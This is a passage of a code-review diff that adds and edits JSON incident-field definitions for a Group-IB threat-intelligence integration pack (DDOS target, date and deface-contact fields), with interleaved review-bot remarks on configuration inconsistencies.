b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json 
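Review bot: `"propagationLabels": ["all"]` is set on GIB_DDOS_Target_Domain here and on GIB_DDOS_Target_URL (L100), but on none of the sibling DDOS target fields added in this series (ASN, Category, City, Country Code, Country Name, IP, Port, Provider, Region), so on a multi-tenant deployment only these two fields of a GIB Attacks DDOS incident would be pushed to every tenant while the rest stay local. Either drop the key from these two files so all DDOS target fields behave alike, or add it to the siblings if tenant-wide propagation is intended; the difference looks like an artifact of which file each was copied from rather than a design choice.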
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json new file mode 100644 index 000000000000..a9cb46c71a8d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetport", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetport", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Port", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json new file mode 100644 index 000000000000..a4379a4404bd --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json new file mode 100644 index 000000000000..8eb184825c08 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetregion", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetregion", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Region", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json new file mode 100644 index 000000000000..f4050737b89d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargeturl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargeturl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json new file mode 100644 index 000000000000..80fea87d7ae1 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostype", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostype", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Type", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json index 9ab3f2d7af7c..b5e51e996346 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json @@ -1,7 +1,10 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB OSI Public Leak" + "GIB OSI Public Leak", + "GIB Compromised Mule", + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group" ], "caseInsensitive": false, "cliName": "gibdatahash", 
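Review bot: GIB_Data_Hash now also receives values from GIB Compromised Mule, GIB Attacks Phishing Kit and GIB Attacks Phishing Group, but the unchanged `"caseInsensitive": false` just below the hunk means a digest delivered as upper-case hex by one of these sources will not match the same digest stored lower-case from another when the field is searched or used to spot duplicates. If the mapper does not normalise the hash before writing it, consider `"caseInsensitive": true` for this field. The rest of the file continues in the next hunk.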
@@ -25,5 +28,13 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Public Leak",
+ "GIB Compromised Mule",
+ "GIB Attacks Phishing Kit",
+ "GIB Attacks Phishing Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json
new file mode 100644
index 000000000000..eae41256cd18
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Compromised Mule"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdateadd",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdateadd",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Date Add",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Mule"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json
index 9c378027748e..6f97afc2baed 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json
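Review bot: `systemAssociatedTypes` is added as a verbatim copy of `associatedTypes` in GIB_Data_Hash here, and the same duplication is repeated in GIB_Date_Compromised and GIB_Date_Created (L103), GIB_Date_Expired (L104), GIB_Date_of_Detection (L113) and GIB_Downloaded_From (L116), so every future change to a type list has to be made twice per file and the two copies can silently drift. `systemAssociatedTypes`, `itemVersion` and `openEnded` look like keys the server writes on export rather than authored content; if the pack tooling regenerates them, committing them will produce a spurious diff on every re-export. Confirm with the pack validator whether these keys belong in the repository copy; if not, keep only the `associatedTypes` change in the modified files.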
@@ -26,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card",
+ "GIB Compromised Account"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json
index 91bbe35a5fff..940f6fe370be 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json
@@ -3,7 +3,8 @@
 "associatedTypes": [
 "GIB OSI Public Leak",
 "GIB Brand Protection Phishing Kit",
- "GIB Brand Protection Domain"
+ "GIB Brand Protection Domain",
+ "GIB OSI Git Leak"
 ],
 "caseInsensitive": true,
 "cliName": "gibdatecreated",
@@ -27,5 +28,13 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Public Leak",
+ "GIB Brand Protection Phishing Kit",
+ "GIB Brand Protection Domain",
+ "GIB OSI Git Leak"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json
new file mode 100644
index 000000000000..8b6a6b3be1fa
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json
@@ -0,0 +1,40 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Cybercriminal Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdatecreatedat",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdatecreatedat",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Date Created At",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Cybercriminal Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json
index 025a848d242f..d84813dfeb9d 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json new file mode 100644 index 000000000000..ecf675980cc7 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibdatefirstcompromised", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatefirstcompromised", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date First Compromised", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json new file mode 100644 index 000000000000..adef461de8db --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json 
@@ -0,0 +1,62 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatefirstseen", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatefirstseen", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date First Seen", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json new file mode 100644 index 000000000000..b0d3f3bb723b --- /dev/null 
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Compromised Mule"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdateincident",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdateincident",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Date Incident",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Mule"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json
new file mode 100644
index 000000000000..33812076f495
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json
@@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibdatelastcompromised", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatelastcompromised", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Last Compromised", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json new file mode 100644 index 000000000000..794463dbcbbd --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json 
@@ -0,0 +1,62 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB OSI Vulnerability", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatelastseen", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatelastseen", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Last Seen", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB OSI Vulnerability", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json new file mode 100644 index 000000000000..6caa9b6739b3 --- /dev/null 
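Review bot: The type lists of GIB_Date_First_Seen (L106) and GIB_Date_Last_Seen here are not symmetric: First Seen includes `"GIB Malware"` but not `"GIB OSI Vulnerability"`, while Last Seen includes `"GIB OSI Vulnerability"` but not `"GIB Malware"`. That may be deliberate (a vulnerability record gets GIB_Date_Published rather than a first-seen date, and malware gets GIB_Date_Updated_At), but from the field definitions alone it reads like an omission in one of the two files. A line in the pack README or mapper documentation stating which feed populates which date field would make the asymmetry verifiable.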
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdatemodified",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdatemodified",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Date Modified",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json
new file mode 100644
index 000000000000..473776340603
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json
@@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatepublished", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatepublished", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Published", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json new file mode 100644 index 000000000000..7280813d46b5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json 
@@ -0,0 +1,40 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Malware",
+ "GIB Cybercriminal Threat Actor",
+ "GIB APT Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdateupdatedat",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdateupdatedat",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Date Updated At",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Malware",
+ "GIB Cybercriminal Threat Actor",
+ "GIB APT Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json
index af37ae5c4b7b..39750b0e5407 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json
@@ -6,7 +6,12 @@
 "GIB Brand Protection Phishing Kit",
 "GIB OSI Git Leak",
 "GIB Compromised Card",
- "GIB Compromised Account"
+ "GIB Compromised Account",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Malware CNC",
+ "GIB Attacks Phishing Group",
+ "GIB Suspicious IP Socks Proxy"
 ],
 "caseInsensitive": true,
 "cliName": "gibdateofdetection",
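Review bot: GIB_Date_Updated_At covers `"GIB Malware"` and `"GIB APT Threat Actor"` but not `"GIB Cybercriminal Threat"` or `"GIB Nation-State Cybercriminals Threat"`, whereas GIB_Date_Created_At (L104) covers those two threat types and omits Malware and APT Threat Actor, so an APT threat-actor incident gets an updated-at date with no created-at date and a threat incident gets the opposite. If the upstream feeds genuinely expose only one of the two timestamps per type, that mapping cannot be commented in JSON and should be stated in the pack README; otherwise the missing types should be added so both fields cover the same incident types.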
@@ -30,5 +35,20 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Targeted Malware",
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Phishing Kit",
+ "GIB OSI Git Leak",
+ "GIB Compromised Card",
+ "GIB Compromised Account",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Malware CNC",
+ "GIB Attacks Phishing Group",
+ "GIB Suspicious IP Socks Proxy"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json
new file mode 100644
index 000000000000..dd8fd8a5a546
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdefacecontacts",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdefacecontacts",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Deface Contacts",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
